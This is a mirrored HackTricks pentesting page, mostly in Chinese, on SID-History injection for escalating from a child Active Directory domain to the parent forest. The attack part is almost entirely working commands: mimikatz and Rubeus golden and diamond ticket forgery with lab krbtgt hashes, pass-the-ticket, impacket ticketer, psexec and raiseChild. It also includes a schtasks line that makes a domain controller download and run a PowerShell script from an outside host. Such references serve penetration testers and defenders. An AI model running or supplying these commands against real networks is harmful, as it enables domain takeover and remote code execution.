mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
8.4 KiB
8.4 KiB
SID-History Injection
☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
攻击
SID 历史旨在支持迁移场景,其中用户将从一个域移动到另一个域。为了保留对“旧”域中资源的访问权限,用户的先前 SID 将被添加到其新帐户的 SID 历史记录中。因此,在创建这样的票证时,可以添加父域中特权组(EAs、DAs 等)的 SID,这将授予对父域中所有资源的访问权限。
这可以通过使用 Golden 或 Diamond Ticket 来实现。
要找到**“企业管理员”组的 SID,您可以找到根域的 SID 并将其设置为 S-1-5-21-<root domain>-519。例如,从根域 SID S-1-5-21-280534878-1496970234-700767426,“企业管理员”**组的 SID 为 S-1-5-21-280534878-1496970234-700767426-519
您还可以使用以 512 结尾的 域管理员组。
另一种找到其他域组(例如“域管理员”)的 SID 的方法是:
Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
使用KRBTGT-AES256的黄金票据(Mimikatz)
{% code overflow="wrap" %}
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
/user is the username to impersonate (could be anything)
/domain is the current domain.
/sid is the current domain SID.
/sids is the SID of the target group to add ourselves to.
/aes256 is the AES256 key of the current domain's krbtgt account.
--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option
/startoffset sets the start time of the ticket to 10 mins before the current time.
/endin sets the expiry date for the ticket to 60 mins.
/renewmax sets how long the ticket can be valid for if renewed.
# The previous command will generate a file called ticket.kirbi
# Just loading you can perform a dcsync attack agains the domain
{% endcode %}
有关黄金票据的更多信息,请查看:
{% content-ref url="golden-ticket.md" %} golden-ticket.md {% endcontent-ref %}
钻石票据(Rubeus + KRBTGT-AES256)
{% code overflow="wrap" %}
# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
# Or a ptt with a golden ticket
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt
# You can use "Administrator" as username or any other string
{% endcode %}
有关钻石票的更多信息,请查看:
{% content-ref url="diamond-ticket.md" %} diamond-ticket.md {% endcontent-ref %}
{% code overflow="wrap" %}
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$
{% endcode %}
使用受损域的KRBTGT哈希值升级为DA或根或企业管理员:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
{% endcode %}
通过攻击获得的权限,您可以在新域中执行例如 DCSync 攻击:
{% content-ref url="dcsync.md" %} dcsync.md {% endcontent-ref %}
从 Linux
使用 ticketer.py 手动操作
# This is for an attack from child to root domain
# Get child domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
# Get root domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"
# Generate golden ticket
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator
# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
# JUST USE THE SAME USERNAME IN THE NEXT STEPS
# Load ticket
export KRB5CCNAME=hacker.ccache
# psexec in domain controller of root
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10
{% endcode %}
使用 raiseChild.py 进行自动化
这是一个 Impacket 脚本,可以自动将权限从子域升级到父域。脚本需要:
- 目标域控制器
- 子域中管理员用户的凭证
流程如下:
- 获取父域的 Enterprise Admins 组的 SID
- 检索子域中 KRBTGT 账户的哈希值
- 创建一个 Golden Ticket
- 登录到父域
- 检索父域中管理员账户的凭证
- 如果指定了
target-exec开关,则通过 Psexec 认证到父域的域控制器。
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
参考资料
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在网络安全公司工作吗?想让你的公司在HackTricks中宣传吗?或者想要访问PEASS的最新版本或下载PDF格式的HackTricks吗?查看订阅计划!
- 发现我们的独家NFT收藏品The PEASS Family
- 获取官方PEASS & HackTricks周边
- 加入 💬 Discord群 或 电报群 或 关注 我的 Twitter 🐦@carlospolopm.
- 通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享您的黑客技巧。